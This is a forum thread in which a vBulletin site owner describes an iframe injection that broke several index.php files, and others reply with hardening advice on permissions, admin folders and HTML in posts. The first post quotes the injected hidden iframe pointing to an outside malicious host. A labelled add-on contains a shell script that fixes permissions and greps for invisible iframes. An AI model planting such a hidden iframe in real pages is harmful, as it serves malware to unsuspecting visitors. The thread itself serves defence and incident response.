iframe injection attacks

Ben10

New Member
Hello

I am creating this thread to raise awareness about the "iframe injection attack".
I faced this attack today and I also created a thread http://www.vbteam.info/how/24123-parse-error.html where "bluescorpion" helped me.
Now I want to learn how we can secure our site from this attack. When my forum was attacked I got these errors:
In Index.php
Parse error: syntax error, unexpected '<' in /home/*******/public_html/index.php on line 585
In Admincp index.php
Parse error: syntax error, unexpected $end, expecting ',' or ';' in /home/*******/public_html/admincp/index.php on line 1123
I also get an error in the archive "Index.php".
In gallery index.php
Parse error: syntax error, unexpected '<', expecting T_VARIABLE or '$' in /home/******/public_html/gallery/index.php on line 423
I also get an error in the arcade index.php.

When I open the index.php, on line 585 I see this:
Code:
<iframe src="http://thelotmachine.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"></iframe>
There is no other line after this.

So share your experiences and solutions to secure the forum from these attacks.

Regards
Ben
 

Grinderhand

New Member
Use strong passwords for yourself and your assistant admins/mods.

Check your file/folder permissions. Files - 644, folders - 755.

Rename your admincp/modcp folders to something else and reflect these changes in your config.php.

Password protect your admincp/modcp folders using .htaccess with strong passwords.

Choose your staff carefully. If you don't know them well enough to trust them with your possessions ...

Make sure you are updated to the latest version possible.

Delete your /install directory entirely. You don't need anything in there.

If you ever needed to use ANYTHING from the do_not_upload folder in your vB installation archive to fix a problem on your forum, make sure you have deleted it when finished. MAJOR SECURITY HOLE if you don't.

Use strong passwords for your FTP access.

If you have removed any mods, make sure to remove all files uploaded in association with those mods.

NEVER allow HTML in posts, PMs or sigs.

NEVER make a backup of your database anywhere in public_html or below. If you must make a backup, make sure it's somewhere above your webroot.

Make sure you do frequent virus/trojan scans of your own computer and require the same of your staff. After all, this is the machine you use to access your forum's inner workings.

Follow these guidelines and you'll be much safer and happier.
 

Ben10

New Member
Hmmm, my file permission is 755.
Will any problem occur when I change all the file permissions to 644?
 

Ben10

New Member
Grinderhand said:
Files should all be set to 644 - no exceptions. If yours are 755 that may be why you got file injections.

Thanks bro, I am going to do this. Does that mean all the files which are in public_html should be 644?
 

Grinderhand

New Member
ALL files in EVERY directory AND subdirectory below public_html. Best advice is to CHMOD EVERYTHING in public_html and below to 644 then go back and CHMOD the folders only to 755 as there are fewer of them.

One note: If you have attachments moved out of the database and into the file system, that folder MUST be CHMODed to 777 so they can be written to, so make sure your attachments folder is above public_html. If it isn't now, change it and move all your attachments there. Same advice goes for user album pics and avatars. If you are storing everything in the database, ignore this note.
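
The permission scheme described in this post, as an added example that is not part of the original post or of vBulletin: it audits and applies 644/755 with `find`, and also flags files carrying an invisible iframe like the one quoted in the first post. The function names and the sample tree (including the `injected.example` URL) are constructed for illustration, and the `display: none` match goes slightly beyond the `visibility: hidden` case seen in the thread.

```shell
#!/bin/sh
# Added example: audit and normalise permissions under a web root, and flag
# files that contain an invisible <iframe>.

# List files that are not 644 and directories that are not 755.
audit_perms() {
    find "$1" -type f ! -perm 644 -print
    find "$1" -type d ! -perm 755 -print
}

# Apply 644 to files and 755 to directories. Setting each type directly
# avoids a window where directories sit at 644 and cannot be traversed.
fix_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# List PHP/HTML files containing an iframe styled to be invisible.
# "|| true" keeps the function from failing when nothing matches.
find_hidden_iframes() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -liE '<iframe[^>]*(visibility:[[:space:]]*hidden|display:[[:space:]]*none)' {} + || true
}

# Constructed sample tree (not real forum files); prints its path.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/admincp"
    printf '<?php echo "ok"; ?>\n' > "$root/admincp/index.php"
    printf '<?php echo "ok"; ?>\n<iframe src="http://injected.example/x" width=125 height=125 style="visibility: hidden"></iframe>\n' > "$root/index.php"
    chmod 755 "$root/index.php"          # over-permissive file
    chmod 644 "$root/admincp/index.php"  # already correct
    chmod 777 "$root/admincp"            # world-writable directory
    chmod 755 "$root"
    printf '%s\n' "$root"
}

tree=$(make_sample_tree)
echo "Before:"; audit_perms "$tree"
fix_perms "$tree"
echo "After (should be empty):"; audit_perms "$tree"
echo "Hidden iframes:"; find_hidden_iframes "$tree"
rm -rf "$tree"
```

On a real site, run `audit_perms` and `find_hidden_iframes` against public_html first and review the output before running `fix_perms`; a flagged file still has to be cleaned or restored from a known-good copy.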
 

Ben10

New Member
Grinderhand said:
ALL files in EVERY directory AND subdirectory below public_html. Best advice is to CHMOD EVERYTHING in public_html and below to 644 then go back and CHMOD the folders only to 755 as there are fewer of them.

One note: If you have attachments moved out of the database and into the file system, that folder MUST be CHMODed to 777 so they can be written to, so make sure your attachments folder is above public_html. If it isn't now, change it and move all your attachments there. Same advice goes for user album pics and avatars. If you are storing everything in the database, ignore this note.

Thanks a lot bro for this very nice clarification. I am going to do this as you advise. Thanks again; if I have any further questions I must ask you :p
 